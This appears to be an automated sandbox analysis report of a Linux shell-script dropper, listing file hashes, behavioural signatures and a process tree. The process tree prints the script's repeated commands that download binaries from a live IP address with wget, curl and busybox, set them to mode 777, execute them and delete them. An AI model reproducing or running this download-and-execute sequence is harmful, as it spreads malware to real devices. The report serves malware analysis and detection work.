Analysis
-
max time kernel
149s -
max time network
154s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 02:16
Static task
static1
Behavioral task
behavioral1
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
-
Size
10KB
-
MD5
62cc0d748ce1bc23e334fb8337b1bf09
-
SHA1
6ad81a5d3316adcab7a039a21fa81bfbcbf8b748
-
SHA256
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6
-
SHA512
276eac78c58b4d7a6fc6421f2ec0499bfda30e027d56c3602575fe6e71f2a006c4ca64db15c7080c252f02c698df1e83702fe82ac41266fcd0cebb3ba32454f5
-
SSDEEP
192:fgZwipsY9skLiE1Zq/7DlJOqDgAimsY9skyxB1Zq/7DHOqDgAiA:fewiBi19a5UAA
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 965 chmod 746 chmod 881 chmod 905 chmod 917 chmod 923 chmod 893 chmod 911 chmod 947 chmod 941 chmod 785 chmod 830 chmod 863 chmod 875 chmod 929 chmod 740 chmod 815 chmod 899 chmod 953 chmod 959 chmod 857 chmod 971 chmod 869 chmod 887 chmod 732 chmod 809 chmod 935 chmod 977 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS 733 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk 741 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj 747 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv 786 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu 810 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR 816 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr 831 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG 858 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ 864 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU 870 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo 876 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD 882 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH 888 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R 894 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk 900 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj 906 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS 912 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu 918 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR 924 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv 930 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU 936 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo 942 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD 948 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr 954 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG 960 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ 966 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH 972 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R 978 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj curl File opened for modification /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG curl File opened for modification /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr curl File opened for modification /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH curl File opened for modification /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj curl File opened for modification /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR curl File opened for modification /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ curl File opened for modification /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv curl File opened for modification /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU curl File opened for modification /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS curl File opened for modification /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv curl File opened for modification /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu curl File opened for modification /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR curl File opened for modification /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD curl File opened for modification /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH curl File opened for modification /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R curl File opened for modification /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk curl File opened for modification /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU curl File opened for modification /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R curl File opened for modification /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo curl File opened for modification /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ curl File opened for modification /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk curl File opened for modification /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo curl File opened for modification /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD curl File opened for modification /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS curl File opened for modification /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu curl File opened for modification /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG curl File opened for modification /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr curl
Processes
-
/tmp/988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh/tmp/988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:707
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:711
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:729
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:736
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:739
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:745
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:749
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:779
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:792
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:807
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:814
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:817
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:818
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:826
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:831
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:836
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:856
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:859
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:862
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:868
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:874
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:880
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:886
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:892
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:898
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:904
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:910
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:916
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:922
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:928
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:934
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:935
-
-
